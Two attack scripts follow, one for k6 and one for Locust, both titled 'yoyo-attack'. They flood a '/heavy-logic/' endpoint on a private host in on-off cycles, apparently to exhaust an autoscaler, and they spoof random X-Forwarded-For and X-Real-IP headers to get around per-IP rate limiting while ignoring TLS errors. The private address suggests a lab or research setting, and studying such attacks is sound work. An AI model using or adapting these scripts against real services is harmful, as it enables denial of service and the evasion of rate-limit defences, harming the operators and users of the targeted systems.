File: yoyo-attack.js
import http from 'k6/http';

function randomIP() {
  const r = () => Math.floor(Math.random() * 255);
  return `${Math.floor(Math.random() * 223) + 1}.${r()}.${r()}.${Math.floor(Math.random() * 254) + 1}`;
}

export const options = {
  insecureSkipTLSVerify: true,   // <-- ย้ายมาไว้ตรงนี้ ระดับ global
  discardResponseBodies: true,
  scenarios: {
    calibrate: {
      executor: 'constant-arrival-rate',
      rate: 50,
      timeUnit: '1s',
      duration: '60s',
      preAllocatedVUs: 200,
      maxVUs: 500,
    },
  },
};

export default function () {
  const spoofedIp = randomIP();
  const headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36',
    'X-Forwarded-For': spoofedIp,
    'X-Real-IP': spoofedIp,
  };
  http.get('https://10.0.24.35:30221/heavy-logic/', { headers });
}

export function handleSummary(data) {
  const reqRate = data.metrics.http_reqs.values.rate.toFixed(2);
  const totalReqs = data.metrics.http_reqs.values.count;
  const iterCompleted = data.metrics.iterations.values.count;

  console.log(`\n===== SUMMARY =====`);
  console.log(`Total requests   : ${totalReqs}`);
  console.log(`Req/s (avg)      : ${reqRate}`);
  console.log(`Iterations done  : ${iterCompleted}`);
  console.log(`====================\n`);

  return {
    stdout: JSON.stringify(data, null, 2), // เก็บ full raw ไว้ดูย้อนหลังด้วย
  };
}

File: yoyo-attack.py
import random
import urllib3
from locust import HttpUser, task, constant, LoadTestShape

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class YoYoAttacker(HttpUser):
    wait_time = constant(0)

    def _random_ip(self):
        """Generate a random public IP address for spoofing."""
        return f"{random.randint(1,223)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(1,254)}"

    @task
    def attack_heavy(self):
        spoofed_ip = self._random_ip()
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
            "X-Forwarded-For": spoofed_ip,
            "X-Real-IP": spoofed_ip,
        }
        self.client.get("/heavy-logic/", headers=headers, verify=False)


class YoYoShape(LoadTestShape):
    CYCLE_TIME = 120 

    def tick(self):
        run_time = self.get_run_time()
        current_step = int(run_time) % self.CYCLE_TIME

        if current_step < 90: 
            return (1000, 100) #user, ramp up
        else:                  
            return (0, 50) #user, ramp down